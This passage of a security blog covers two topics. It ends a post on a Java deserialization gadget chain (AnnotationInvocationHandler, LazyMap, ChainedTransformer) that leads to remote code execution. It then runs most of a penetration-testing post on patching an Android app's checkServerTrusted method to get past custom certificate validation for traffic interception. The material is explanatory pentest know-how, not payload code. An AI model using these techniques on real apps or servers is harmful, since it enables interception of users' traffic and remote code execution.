<li>The method invocation on the Proxy is transferred to AnnotationInvoctionHandler corresponding to the MapProxy instance along with the method and a blank array.</li>
<li>The lazyMap attempts to retrieve a value with key equal to the method name "entrySet".</li>
<li>Since that key does not exist, the lazyMap instance goes ahead and tries to create a new key with the name "entrySet".</li>
<li>Since a chainedTransformer is set to execute during the key creation process, the chained transformer with the malicious payload is invoked, leading to remote code execution.</li>
</ol>
<img border="0" height="366" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg6SboQYGyvmS7-Oo3PyhaIB5ebAjiTPRjFhy7lfX-oZKEsurAcX45JElIv_6OtA7ovAv5ix54mtaNCIzCn1F-Na8Rf1oc_i3tqirU5-GOu0Y9nnXOkwVBNB9T9m9Yf80OPKu7Par5nc9hZ/s400/Exploit+Flow.png" width="400" /><br />
Image 4: Shows the code path to RCE<br />
<br />
<br />
The following three images show the actual code path traversed from AnnotationInvocationHandler class leading up to LazyMap's ChainedTransformer invocation, resulting in RCE.<br />
<br />
<img border="0" height="271" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi64aJ94k1kSWiAptue6p0c_4reM_Rdy2iRVRK9EXJPGfkL9VlTabipRQ0_tFLvgcQIWH0f0bUtNaalJi4cDhvZwXThRoUgwS1u7P-ASSXMv5T9XYAhEBEVCpOJ1AhRHtH4xlHTK9Rq-PiR/s400/readObject_AnnotationIH_entrySet.png" width="400" />
<br />
Image 5: Shows AnnotationInvocationHandler's readObject() method that calls entrySet() on mapProxy<br />
<br />
<br />
<img border="0" height="205" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi6waVOp4mTRP8FwFJ0zXqXF20yV1E5swSsyi8ewJjXnYjM07TELS3vY-IoZwPG8Ktw2da28e53aVD7xnlwrblm8R_Zp15wg6hSLLDbiO8xIb2CAlwnspeu1Gor65OsXxXOcT3c7Y04c-rc/s400/invoke_AnnotationIH_get.png" width="400" />
<br />
Image 6: Shows AnnotationInvocationHandler's invoke method that was attached to the mapProxy<br />
<br />
<br />
<img border="0" height="116" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj0C8oxODlox6bTUs9UJF5z7KZr6sCaweLRHbzuk_mZwzsIXersvALZfY6KuGBAsj7pcCoutqePr6fB7IP4vNheNTrw4b0UweyI0zedGOYgwrUfPaoFSK5h9wucV_6PxcqKz-nivF4GZWlW/s400/lazyMap_get.png" width="400" />
<br />
Image 7: Shows transformer invocation when a key is not present<br />
<div>
<br /></div>
</div>
Gursev Singh Kalrahttp://www.blogger.com/profile/11125392470187170013noreply@blogger.com1tag:blogger.com,1999:blog-4663432300421783651.post-87240512801721020092013-11-05T09:35:00.001-08:002013-11-05T11:43:27.364-08:00Patching an Android Application to Bypass Custom Certificate Validation<div dir="ltr" style="text-align: left;" trbidi="on">
<div dir="ltr" style="line-height: 1.1500000000000001; margin-bottom: 10pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 17px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">One of the important tasks while performing mobile application security assessments is to be able to intercept the traffic (Man in The Middle, MiTM) between the mobile application and the server by a web proxy like Fiddler, Burp etc… This allows penetration tester to observe application behavior, modify the traffic and overcome the input restrictions enforced by application’s user interface to perform a holistic penetration test. </span></div>
<div dir="ltr" style="line-height: 1.1500000000000001; margin-bottom: 10pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 17px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">Mobile applications exchanging sensitive data typically use </span><a href="http://en.wikipedia.org/wiki/HTTP_Secure" style="text-decoration: none;"><span style="background-color: transparent; color: blue; font-family: Calibri; font-size: 17px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: underline; vertical-align: baseline; white-space: pre-wrap;">HTTPS</span></a><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 17px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"> protocol for data exchange as allows them to perform server authentication to ensure a secure communication channel. The client authenticates the server by verifying server’s certificate against its trusted root </span><a href="http://en.wikipedia.org/wiki/Certificate_authority" style="text-decoration: none;"><span style="background-color: transparent; color: blue; font-family: Calibri; font-size: 17px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: underline; vertical-align: baseline; white-space: pre-wrap;">certificate authority</span></a><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 17px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"> (CA) store and also checks the certificate’s common name against the domain name of the server presenting the certificate. To perform MiTM on the HTTPS traffic for mobile application, web proxy’s certificate is imported to the trusted root CA store otherwise the application may not function due to certificate errors. </span></div>
<div dir="ltr" style="line-height: 1.1500000000000001; margin-bottom: 10pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 17px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">On a recent Android application assessment, I setup a web proxy to intercept mobile application’s SSL traffic by importing its certificate to device’s trusted root CA store. To ensure that the imported CA certificate works fine, I used Android’s browser to visit a couple of SSL based websites and the browser accepted the MiTM’ed traffic without complains. Typically, the native Android applications also use the common trusted root CA store to validate server certificates, so no extra work is required to intercept their traffic. However, the application I was testing was different as we will see below.</span></div>
<b id="docs-internal-guid-7c810dd9-2952-9398-ee31-2d6699b4649f" style="font-weight: normal;"><br /><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 17px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"></span></b>
<br />
<div dir="ltr" style="line-height: 1.1500000000000001; margin-bottom: 10pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-style: normal; font-variant: normal; font-weight: bold; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><span style="font-size: x-large;">Analyzing the Unsuccessful MiTM</span></span></div>
<div dir="ltr" style="line-height: 1.1500000000000001; margin-bottom: 10pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 17px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">When I launched the application and attempted pass its traffic through the web proxy, it displayed an error screen indicating that it could not connect to the remote server because of no internet connection or it could not establish a connection for unknown reasons. Things were not adding up as this configuration has mostly worked in the past so I turned to analyzing systems logs and SSL cipher suite support.</span></div>
<div dir="ltr" style="line-height: 1.1500000000000001; margin-bottom: 10pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-style: normal; font-variant: normal; font-weight: bold; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><span style="font-size: large;">Logcat</span></span></div>
<div dir="ltr" style="line-height: 1.1500000000000001; margin-bottom: 10pt; margin-top: 0pt;">
<a href="http://developer.android.com/tools/help/logcat.html" style="text-decoration: none;"><span style="background-color: transparent; color: blue; font-family: Calibri; font-size: 17px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: underline; vertical-align: baseline; white-space: pre-wrap;">Logcat</span></a><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 17px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"> is Android’s logging mechanism that is used to view application debug messages and logs. I ran </span><a href="http://developer.android.com/tools/help/adb.html" style="text-decoration: none;"><span style="background-color: transparent; color: blue; font-family: 'Courier New'; font-size: 17px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: underline; vertical-align: baseline; white-space: pre-wrap;">adb</span></a><span style="background-color: transparent; color: black; font-family: 'Courier New'; font-size: 17px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"> logcat</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 17px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"> to check if the application under test created any stack trace indicating the cause of the error but there was none. The application also did not leave any debug logs indicating that the developers did a good job with the error handling and did not write debug messages that could potentially expose application internal working to prying eyes.</span></div>
<div dir="ltr" style="line-height: 1.1500000000000001; margin-bottom: 10pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-style: normal; font-variant: normal; font-weight: bold; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><span style="font-size: large;">Common SSL Cipher suites</span></span></div>
<div dir="ltr" style="line-height: 1.1500000000000001; margin-bottom: 10pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 17px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">When a web proxy acts as a MiTM between client and the server, it establishes two SSL communication channels. One channel is with the client to receive requests and return responses, the second channel is to forward application requests to the server and receive server responses. To establish these channels, the web proxy has to agree on common SSL cipher suits with both the client and the server and these cipher suites may not be the same as shown in the image below.</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"></span></div>
<div class="separator" style="clear: both; text-align: center;">
</div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEidrsFSafSQvRzeVdmWoeuDbRR7x8b8muOq-a9qhvtK6fs8BOXkQvrzEVkvQwgXYBqbnbEFF4OOc13NKDXUZOxl1xT4S0B1HV9HAroP-CrEMXy8-KRL7erkXW3RlY4OBfMsq-DxwW98pDWi/s1600/Drawing1.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="91" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEidrsFSafSQvRzeVdmWoeuDbRR7x8b8muOq-a9qhvtK6fs8BOXkQvrzEVkvQwgXYBqbnbEFF4OOc13NKDXUZOxl1xT4S0B1HV9HAroP-CrEMXy8-KRL7erkXW3RlY4OBfMsq-DxwW98pDWi/s400/Drawing1.jpg" width="400" /></a></div>
<div dir="ltr" style="line-height: 1.1500000000000001; margin-bottom: 10pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 17px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><br /></span></div>
<div dir="ltr" style="line-height: 1; margin-bottom: 10pt; margin-top: 0pt;">
<span style="font-family: Calibri; font-size: 17px; line-height: 1.1500000000000001; white-space: pre-wrap;">I have observed SSL proxying errors in the past to occur in one or both of the following scenarios which lead to failures while establishing a communication channel.</span></div>
<ol style="margin-bottom: 0pt; margin-top: 0pt;">
<li dir="ltr" style="background-color: transparent; color: black; font-family: Calibri; font-size: 17px; font-style: normal; font-variant: normal; font-weight: normal; list-style-type: decimal; text-decoration: none; vertical-align: baseline;"><div dir="ltr" style="line-height: 1.1500000000000001; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 17px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">Android application and the web proxy do not share any common SSL cipher suite. </span></div>
</li>
<li dir="ltr" style="background-color: transparent; color: black; font-family: Calibri; font-size: 17px; font-style: normal; font-variant: normal; font-weight: normal; list-style-type: decimal; text-decoration: none; vertical-align: baseline;"><div dir="ltr" style="line-height: 1.1500000000000001; margin-bottom: 10pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 17px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">The web proxy and the server do not share any common SSL cipher suite. </span></div>
</li>
</ol>
<div dir="ltr" style="line-height: 1.1500000000000001; margin-bottom: 10pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 17px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">In both scenarios, the communication channel cannot be established and the application does not work. To analyze the above mentioned scenarios, I fired up Wireshark to analyze SSL handshake between the application and the web proxy, and discovered that they shared common SSL cipher suites.</span></div>
<div dir="ltr" style="line-height: 1.1500000000000001; margin-bottom: 10pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 17px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">With the first scenario ruled out, I issued a HTTPS request to the server with the web proxy and that appeared to work without any errors indicating presence of common SSL ciphers between web proxy and the server.</span></div>
<div dir="ltr" style="line-height: 1.1500000000000001; margin-bottom: 10pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 17px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">So the web proxy was capable of performing MiTM for the test application and there was something else going under the hood.</span></div>
<b style="font-weight: normal;"><br /><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 17px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"></span></b>
<br />
<div dir="ltr" style="line-height: 1.1500000000000001; margin-bottom: 10pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-style: normal; font-variant: normal; font-weight: bold; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><span style="font-size: x-large;">Custom Certificate Validation</span></span></div>
<div dir="ltr" style="line-height: 1.1500000000000001; margin-bottom: 10pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 17px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">It was at this point that I started to look into the possibility of the application performing custom certificate validation to prevent the possibility of MiTM to monitor/modify its traffic flow. HTTPS clients can perform custom certificate validation by implementing the </span><span style="background-color: transparent; color: black; font-family: 'Courier New'; font-size: 17px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">X509TrustManager</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 17px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"> interface and then using it for its HTTPS connections. The process of creating HTTPS connections with custom certificate validation is summarized below:</span></div>
<ol style="margin-bottom: 0pt; margin-top: 0pt;">
<li dir="ltr" style="background-color: transparent; color: black; font-family: Arial; font-size: 17px; font-style: normal; font-variant: normal; font-weight: normal; list-style-type: decimal; text-decoration: none; vertical-align: baseline;"><div dir="ltr" style="line-height: 1.1500000000000001; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 17px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">Implement methods of the </span><span style="background-color: transparent; color: black; font-family: 'Courier New'; font-size: 17px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">X509TrustManager</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 17px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"> interface as required. The server certificate validation code will live inside the </span><span style="background-color: transparent; color: black; font-family: 'Courier New'; font-size: 17px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">checkServerTrusted</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 17px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"> method. This method will throw an exception if the certificate validation fails or will return </span><span style="background-color: transparent; color: black; font-family: 'Courier New'; font-size: 17px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">void</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 17px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"> otherwise.</span></div>
</li>
<li dir="ltr" style="background-color: transparent; color: black; font-family: Arial; font-size: 17px; font-style: normal; font-variant: normal; font-weight: normal; list-style-type: decimal; text-decoration: none; vertical-align: baseline;"><div dir="ltr" style="line-height: 1.1500000000000001; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 17px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">Obtain a </span><span style="background-color: transparent; color: black; font-family: 'Courier New'; font-size: 17px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">SSLContext</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 17px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"> instance.</span></div>
</li>
<li dir="ltr" style="background-color: transparent; color: black; font-family: Arial; font-size: 17px; font-style: normal; font-variant: normal; font-weight: normal; list-style-type: decimal; text-decoration: none; vertical-align: baseline;"><div dir="ltr" style="line-height: 1.1500000000000001; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 17px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">Create an instance of the </span><span style="background-color: transparent; color: black; font-family: 'Courier New'; font-size: 17px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">X509TrustManager</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 17px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"> implementation and use it to initialize </span><span style="background-color: transparent; color: black; font-family: 'Courier New'; font-size: 17px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">SSLContext.</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 17px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"></span></div>
</li>
<li dir="ltr" style="background-color: transparent; color: black; font-family: Arial; font-size: 17px; font-style: normal; font-variant: normal; font-weight: normal; list-style-type: decimal; text-decoration: none; vertical-align: baseline;"><div dir="ltr" style="line-height: 1.1500000000000001; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 17px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">Obtain </span><span style="background-color: transparent; color: black; font-family: 'Courier New'; font-size: 17px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">SSLSocketFactory</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 17px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"> from the </span><span style="background-color: transparent; color: black; font-family: 'Courier New'; font-size: 17px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">SSLContext </span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 17px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">instance.</span></div>
</li>
<li dir="ltr" style="background-color: transparent; color: black; font-family: Arial; font-size: 17px; font-style: normal; font-variant: normal; font-weight: normal; list-style-type: decimal; text-decoration: none; vertical-align: baseline;"><div dir="ltr" style="line-height: 1.1500000000000001; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 17px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">Provide the </span><span style="background-color: transparent; color: black; font-family: 'Courier New'; font-size: 17px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">SSLSocketFactory</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 17px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"> instance to </span><span style="background-color: transparent; color: black; font-family: 'Courier New'; font-size: 17px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">setSSLSocketFactory</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 17px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"> method of the </span><span style="background-color: transparent; color: black; font-family: 'Courier New'; font-size: 17px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">HttpsURLConnection</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 17px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">.</span></div>
</li>
<li dir="ltr" style="background-color: transparent; color: black; font-family: Arial; font-size: 17px; font-style: normal; font-variant: normal; font-weight: normal; list-style-type: decimal; text-decoration: none; vertical-align: baseline;"><div dir="ltr" style="line-height: 1.1500000000000001; margin-bottom: 10pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 17px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">Instance of </span><span style="background-color: transparent; color: black; font-family: 'Courier New'; font-size: 17px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">HttpsURLConnection</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 17px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"> class will then communicate with the server and will invoke </span><span style="background-color: transparent; color: black; font-family: 'Courier New'; font-size: 17px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">checkServerTrusted</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 17px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"> method to perform custom server certificate validation.</span></div>
</li>
</ol>
<div dir="ltr" style="line-height: 1.1500000000000001; margin-bottom: 10pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 17px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">Searching the decompiled code revealed </span><span style="background-color: transparent; color: black; font-family: 'Courier New'; font-size: 17px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">X509TrustManager</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 17px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"> implementation in one of the core security classes of the application. The next step was to patch the code preventing the MiTM and deploy it for testing. The image two methods implemented for </span><span style="background-color: transparent; color: black; font-family: 'Courier New'; font-size: 17px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">X509TrustManager.</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 17px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"></span></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhwvmhqTGnPZpQ1cq0ZRonG4WwvizWMUjkplyjECEcyatJxlk5IsLL80KQl9HXmI-bW647zOjYDEoFT9gD0Ijai_9B_SDxMX58gJQZkDmE4hGW-7GTRpcmPm26vpTdHPfN4U4Z5jHpkyetS/s1600/check-server-trusted-method.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="217" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhwvmhqTGnPZpQ1cq0ZRonG4WwvizWMUjkplyjECEcyatJxlk5IsLL80KQl9HXmI-bW647zOjYDEoFT9gD0Ijai_9B_SDxMX58gJQZkDmE4hGW-7GTRpcmPm26vpTdHPfN4U4Z5jHpkyetS/s400/check-server-trusted-method.png" width="400" /></a></div>
<b style="font-weight: normal;"><br /><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"></span></b>
<br />
<div dir="ltr" style="line-height: 1.1500000000000001; margin-bottom: 10pt; margin-top: 0pt;">
<span style="font-size: x-large;"><span style="background-color: transparent; color: black; font-family: Calibri; font-style: normal; font-variant: normal; font-weight: bold; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">Patching the </span><span style="background-color: transparent; color: black; font-family: 'Courier New'; font-style: normal; font-variant: normal; font-weight: bold; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">checkServerTrusted</span><span style="background-color: transparent; color: black; font-family: Calibri; font-style: normal; font-variant: normal; font-weight: bold; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"> Implementation</span></span></div>
<div dir="ltr" style="line-height: 1.1500000000000001; margin-bottom: 10pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 17px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">The image above shows implementation for two </span><span style="background-color: transparent; color: black; font-family: 'Courier New'; font-size: 17px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">X509TrustManager</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 17px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"> methods, </span><span style="background-color: transparent; color: black; font-family: 'Courier New'; font-size: 17px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">checkServerTrusted</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 17px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"> and </span><span style="background-color: transparent; color: black; font-family: 'Courier New'; font-size: 17px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">checkClientTrusted</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 17px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">. At this point it is important to point out that both the methods behave in a similar way except that the former is used by client side code and the latter is used by server side code. If the certificate validation fails, they would throw an exception, otherwise they return </span><span style="background-color: transparent; color: black; font-family: 'Courier New'; font-size: 17px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">void</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 17px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">. </span></div>
<div dir="ltr" style="line-height: 1.1500000000000001; margin-bottom: 10pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 17px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">The </span><span style="background-color: transparent; color: black; font-family: 'Courier New'; font-size: 17px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">checkClientTrusted</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 17px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"> implementation allows the server side code to validate client certificate. Since this functionality is not required inside the mobile application, this method was empty and returned void for the test application; which is equivalent to successful validation. However, the </span><span style="background-color: transparent; color: black; font-family: 'Courier New'; font-size: 17px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">checkServerTrusted </span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 17px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">contained significant chunk of code performing the custom certificate validation which I needed to bypass.</span></div>
<div dir="ltr" style="line-height: 1.1500000000000001; margin-bottom: 10pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 17px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">To bypass certificate validation code inside the </span><span style="background-color: transparent; color: black; font-family: 'Courier New'; font-size: 17px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">checkServerTrusted</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 17px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"> method, I replaced its Dalvik code with the code from the </span><span style="background-color: transparent; color: black; font-family: 'Courier New'; font-size: 17px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">checkClientTrusted</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 17px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"> method to return void, effectively bypassing the custom certificate check as shown in the image below.</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 17px; font-style: normal; font-variant: normal; font-weight: normal; 